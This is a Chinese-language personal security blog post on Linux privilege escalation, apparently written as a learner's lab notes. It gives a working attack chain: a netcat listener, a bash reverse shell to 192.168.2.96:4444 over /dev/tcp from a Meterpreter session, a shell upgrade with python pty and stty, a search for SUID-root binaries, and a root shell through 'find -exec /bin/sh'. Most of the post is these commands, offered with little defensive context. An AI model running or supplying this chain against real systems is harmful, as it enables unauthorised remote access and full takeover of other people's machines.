<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <title>linux提权 | 个人博客</title>
  <meta name="keywords" content=" 提权 , 维权 , linux ">
  <meta name="description" content="linux提权 | 个人博客">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="1 将meterpreter获得的权限，反弹到kail上。1.1 kaill监听端口1nc -nvlp 4444 &#x2F;&#x2F;nc是监听软件，4444是监听端口   1.2 meterpreter获取权限后，将权限反弹出来1bash -c &#x27;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.96&#x2F;4444 &lt;&amp;1&#x27; &#x2F;&#x2F;将权限反弹到指定ip">
<meta property="og:type" content="article">
<meta property="og:title" content="linux提权">
<meta property="og:url" content="http://example.com/2024/10/11/1%20linux%E7%BB%B4%E6%9D%83%E5%92%8C%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="个人博客">
<meta property="og:description" content="1 将meterpreter获得的权限，反弹到kail上。1.1 kaill监听端口1nc -nvlp 4444 &#x2F;&#x2F;nc是监听软件，4444是监听端口   1.2 meterpreter获取权限后，将权限反弹出来1bash -c &#x27;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.96&#x2F;4444 &lt;&amp;1&#x27; &#x2F;&#x2F;将权限反弹到指定ip">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584181405-f6228c06-0936-47c3-904a-4707b55ced4d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584268726-aee52496-2f22-412a-8d9e-61f9e4e09560.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584463153-c472d14f-6d2e-4b8d-8174-a369c8043590.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584639753-87608500-4599-4b9f-9ea3-a684498c3a6d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722585283689-67ed8977-1087-471d-ac49-dbbb76fa842e.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584836795-b45026c4-9849-4082-a2cf-b7fefe17e3fa.png">
<meta property="article:published_time" content="2024-10-11T02:34:02.000Z">
<meta property="article:modified_time" content="2024-10-11T03:39:20.574Z">
<meta property="article:author" content="komobyte">
<meta property="article:tag" content="提权">
<meta property="article:tag" content="维权">
<meta property="article:tag" content="linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png">


<link rel="icon" href="/img/favicon.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpeg"/>
</a>
<div class="author">
    <span>komobyte</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=872336115&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(15)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="内网">
            
            内网
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="网安学习">
            
            网安学习
            <small>(10)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="15">
<input type="hidden" id="yelog_site_word_count" value="9.5k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://komobyte.github.io/">komonyte</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>报错注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>布尔注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反向代理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>工具</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>谷歌</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>联合注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网穿透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>时间</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>提权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>维权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息收集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息搜集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CVE-2020-0796</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>union</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/10/11/1%20linux%E7%BB%B4%E6%9D%83%E5%92%8C%E6%8F%90%E6%9D%83/"
           data-tag="提权,维权,linux"
           data-author="" >
            <span class="post-title" title="linux提权">linux提权</span>
            <span class="post-date" title="2024-10-11 10:34:02">2024/10/11</span>
        </a>
        
        
        <a  class="全部文章 内网 "
           href="/2024/08/14/%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%EF%BC%88%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%EF%BC%89/"
           data-tag="内网,反向代理,内网穿透"
           data-author="" >
            <span class="post-title" title="内网穿透">内网穿透</span>
            <span class="post-date" title="2024-08-14 20:34:02">2024/08/14</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/3%20MySQL%E5%9F%BA%E7%A1%80/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="MySQL基础">MySQL基础</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/1.%20sql%E6%B3%A8%E5%85%A5%E5%85%A5%E9%97%A8/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="sql注入入门">sql注入入门</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/1%20%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/"
           data-tag="谷歌,信息搜集"
           data-author="" >
            <span class="post-title" title="谷歌语法">谷歌语法</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/2%20%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E5%B7%A5%E5%85%B7/"
           data-tag="信息收集,工具"
           data-author="" >
            <span class="post-title" title="信息收集工具">信息收集工具</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/2%20%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5/"
           data-tag="SQL注入,联合注入,union"
           data-author="" >
            <span class="post-title" title="联合注入">联合注入</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/3%20%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"
           data-tag="SQL注入,报错注入"
           data-author="" >
            <span class="post-title" title="报错注入">报错注入</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/4.%20%E7%9B%B2%E6%B3%A8/"
           data-tag="SQL注入,布尔注入,时间,盲注"
           data-author="" >
            <span class="post-title" title="盲注">盲注</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/15/2%20PHP%E5%9F%BA%E7%A1%80/"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP基础">PHP基础</span>
            <span class="post-date" title="2024-07-15 08:55:02">2024/07/15</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/12/0.2%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91(CVE-2020-0796)/"
           data-tag="CVE-2020-0796,漏洞"
           data-author="" >
            <span class="post-title" title="永恒之黑漏洞利用">永恒之黑漏洞利用</span>
            <span class="post-date" title="2024-07-12 20:18:48">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.6%E9%92%93%E9%B1%BC%E5%92%8C%E8%87%AA%E8%A7%A3%E5%8E%8B%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC%E7%9A%84%E7%BB%BC%E5%90%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="钓鱼和自解压捆绑木马综合">钓鱼和自解压捆绑木马综合</span>
            <span class="post-date" title="2024-07-11 19:23:16">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.5%E8%87%AA%E8%A7%A3%E5%8E%8B%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="自解压捆绑木马">自解压捆绑木马</span>
            <span class="post-date" title="2024-07-11 19:23:06">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.4flash%E9%92%93%E9%B1%BC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="flash钓鱼">flash钓鱼</span>
            <span class="post-date" title="2024-07-11 19:22:55">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/03%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E5%8F%8Anamp%E7%9A%84%E4%BD%BF%E7%94%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="计算机网络基础及hexo使用">计算机网络基础及hexo使用</span>
            <span class="post-date" title="2024-07-11 09:35:30">2024/07/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-1 linux维权和提权" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">linux提权</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="网安学习">网安学习</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color3">提权</a>
            
            <a class="color3">维权</a>
            
            <a class="color1">linux</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2024-10-11 11:39:20'>2024-10-11 10:34</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:1.1k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%B0%86meterpreter%E8%8E%B7%E5%BE%97%E7%9A%84%E6%9D%83%E9%99%90%EF%BC%8C%E5%8F%8D%E5%BC%B9%E5%88%B0kail%E4%B8%8A%E3%80%82"><span class="toc-text">1 将meterpreter获得的权限，反弹到kail上。</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-kaill%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3"><span class="toc-text">1.1 kaill监听端口</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-meterpreter%E8%8E%B7%E5%8F%96%E6%9D%83%E9%99%90%E5%90%8E%EF%BC%8C%E5%B0%86%E6%9D%83%E9%99%90%E5%8F%8D%E5%BC%B9%E5%87%BA%E6%9D%A5"><span class="toc-text">1.2 meterpreter获取权限后，将权限反弹出来</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-3-%E7%A8%B3%E5%9B%BA%E8%87%AA%E5%B7%B1%E7%9A%84%E6%9D%83%E9%99%90"><span class="toc-text">1.3 稳固自己的权限</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%8F%90%E5%8D%87%E8%87%AA%E5%B7%B1%E7%9A%84%E6%9D%83%E9%99%90"><span class="toc-text">2 提升自己的权限</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-1-%E7%A7%BB%E5%8A%A8%E5%88%B0tmp%E7%9B%AE%E5%BD%95%EF%BC%8C%E5%9B%A0%E4%B8%BAtmp%E7%9B%AE%E5%BD%95%E6%9C%89%E6%9D%83%E9%99%90%E3%80%82%E5%B9%B6%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6"><span class="toc-text">2.1 移动到tmp目录，因为tmp目录有权限。并创建一个文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-2-%E5%AF%BB%E6%89%BE%E5%8F%AF%E4%BB%A5%E6%8F%90%E6%9D%83%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-text">2.2 寻找可以提权的命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-3-%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83"><span class="toc-text">2.3 进行提权</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="1-将meterpreter获得的权限，反弹到kail上。"><a href="#1-将meterpreter获得的权限，反弹到kail上。" class="headerlink" title="1 将meterpreter获得的权限，反弹到kail上。"></a>1 将meterpreter获得的权限，反弹到kail上。</h3><h4 id="1-1-kaill监听端口"><a href="#1-1-kaill监听端口" class="headerlink" title="1.1 kaill监听端口"></a>1.1 kaill监听端口</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvlp <span class="number">4444</span> <span class="comment">//nc是监听软件，4444是监听端口</span></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png"></p>
<h4 id="1-2-meterpreter获取权限后，将权限反弹出来"><a href="#1-2-meterpreter获取权限后，将权限反弹出来" class="headerlink" title="1.2 meterpreter获取权限后，将权限反弹出来"></a>1.2 meterpreter获取权限后，将权限反弹出来</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -c <span class="string">&#x27;exec bash -i &amp;&gt;/dev/tcp/192.168.2.96/4444 &lt;&amp;1&#x27;</span> <span class="comment">//将权限反弹到指定ip地址</span></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584181405-f6228c06-0936-47c3-904a-4707b55ced4d.png"></p>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584268726-aee52496-2f22-412a-8d9e-61f9e4e09560.png"></p>
<h4 id="1-3-稳固自己的权限"><a href="#1-3-稳固自己的权限" class="headerlink" title="1.3 稳固自己的权限"></a>1.3 稳固自己的权限</h4><p>Python 代码 <code>python -c &#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39;</code> 是用来创建一个伪终端（pseudo-terminal）并启动一个新的 bash shell。下面是这段代码的具体意思：</p>
<ol>
<li><code>python -c &#39;...&#39;</code>：这是在命令行中运行 Python 代码的方式。<code>-c</code> 选项表示要执行后面引号中的代码。</li>
<li><code>import pty</code>：这行代码导入了 Python 的 <code>pty</code> 模块。<code>pty</code> 模块提供了与伪终端相关的功能。</li>
<li><code>pty.spawn(&quot;/bin/bash&quot;)</code>：这是 <code>pty</code> 模块中的一个函数。<code>spawn</code> 函数启动一个新的子进程，并将其连接到一个伪终端。这里，<code>&quot;/bin/bash&quot;</code> 是要启动的程序，即 bash shell。</li>
</ol>
<p>这些命令用于配置和恢复终端的行为。下面是对每个命令的具体解释：</p>
<ol>
<li><code>stty raw -echo</code>：<ul>
<li><code>stty</code> 是一个用于配置终端属性的命令。</li>
<li><code>raw</code> 模式将终端设置为原始模式。在这种模式下，输入的字符不会被处理（例如，不会进行行缓冲、字符转换等），而是直接传递给程序。这种模式常用于需要对每个输入字符进行精细控制的场景。</li>
<li><code>-echo</code> 选项禁用字符回显。也就是说，输入的字符不会显示在终端上，这在一些需要隐藏输入内容的操作中很有用（例如，输入密码）。</li>
</ul>
</li>
<li><code>fg</code>：<ul>
<li><code>fg</code> 是用来将后台进程恢复到前台的命令。在你启动了一个进程并将其放到后台后（比如使用 <code>Ctrl+Z</code>），可以用 <code>fg</code> 命令将它带回前台。</li>
<li>在这个上下文中，<code>fg</code> 可能是为了将之前被放到后台的进程（比如一个被暂停的 shell）恢复到前台，以便继续交互。</li>
</ul>
</li>
<li><code>reset</code>：<ul>
<li><code>reset</code> 命令用于重置终端到默认状态。这包括恢复终端的各种设置（如输入模式、屏幕显示等），清除任何可能的错误状态，确保终端的正常操作。</li>
<li>这个命令常用于当终端的显示或输入出现异常时，例如在终端的模式被不小心更改后，使用 <code>reset</code> 来恢复到正常状态。</li>
</ul>
</li>
</ol>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>结合在一起，<code>stty raw -echo; fg; reset</code> 的目的可能是：</p>
<ul>
<li>将终端切换到原始模式并禁用回显，以进行某种特殊的交互。</li>
<li>使用 <code>fg</code> 恢复一个之前被放到后台的进程（如一个 shell）到前台。</li>
<li>使用 <code>reset</code> 来重置终端，以确保所有的终端设置恢复到默认状态。</li>
</ul>
<p>这种组合可能用于调试或恢复终端环境，尤其是在交互性和终端配置被破坏或修改的情况下。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span>   <span class="comment">//先记作固定用法</span></span><br><span class="line">ctrl +z </span><br><span class="line">stty raw -echo;fg;reset</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584463153-c472d14f-6d2e-4b8d-8174-a369c8043590.png"></p>
<h3 id="2-提升自己的权限"><a href="#2-提升自己的权限" class="headerlink" title="2 提升自己的权限"></a>2 提升自己的权限</h3><h4 id="2-1-移动到tmp目录，因为tmp目录有权限。并创建一个文件"><a href="#2-1-移动到tmp目录，因为tmp目录有权限。并创建一个文件" class="headerlink" title="2.1 移动到tmp目录，因为tmp目录有权限。并创建一个文件"></a>2.1 移动到tmp目录，因为tmp目录有权限。并创建一个文件</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp</span><br><span class="line">touch <span class="number">1</span></span><br><span class="line">ls</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584639753-87608500-4599-4b9f-9ea3-a684498c3a6d.png"></p>
<h4 id="2-2-寻找可以提权的命令"><a href="#2-2-寻找可以提权的命令" class="headerlink" title="2.2 寻找可以提权的命令"></a>2.2 寻找可以提权的命令</h4><ul>
<li><code>**-perm -4000**</code>：这个选项用于查找具有特定权限的文件。<code>4000</code> 是一个八进制数，表示设置了 <code>setuid</code> 位（也称为 “set user ID” 位）的文件。<code>setuid</code> 位允许文件在执行时以文件所有者的权限运行，而不是执行者的权限。<code>-</code> 表示要匹配具有该权限位的文件，<code>4000</code> 表示具体的权限位。</li>
<li><code>**-print**</code>：这个选项用于打印找到的文件路径。</li>
<li><code>**2&gt;/dev/null**</code>：这是一个重定向操作。<code>2&gt;</code> 用于将标准错误输出（文件描述符 2）重定向到 <code>/dev/null</code>，一个特殊的文件，丢弃所有写入的数据。这样做可以将错误信息（如权限问题或不可访问的目录）隐藏起来，不显示在终端上。</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -user root -perm -<span class="number">4000</span> -print <span class="number">2</span>&gt;/dev/<span class="literal">null</span> </span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722585283689-67ed8977-1087-471d-ac49-dbbb76fa842e.png"></p>
<h4 id="2-3-进行提权"><a href="#2-3-进行提权" class="headerlink" title="2.3 进行提权"></a>2.3 进行提权</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find /tmp -name <span class="number">1</span> -exec <span class="string">&quot;/bin/sh&quot;</span>  \;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584836795-b45026c4-9849-4082-a2cf-b7fefe17e3fa.png"></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

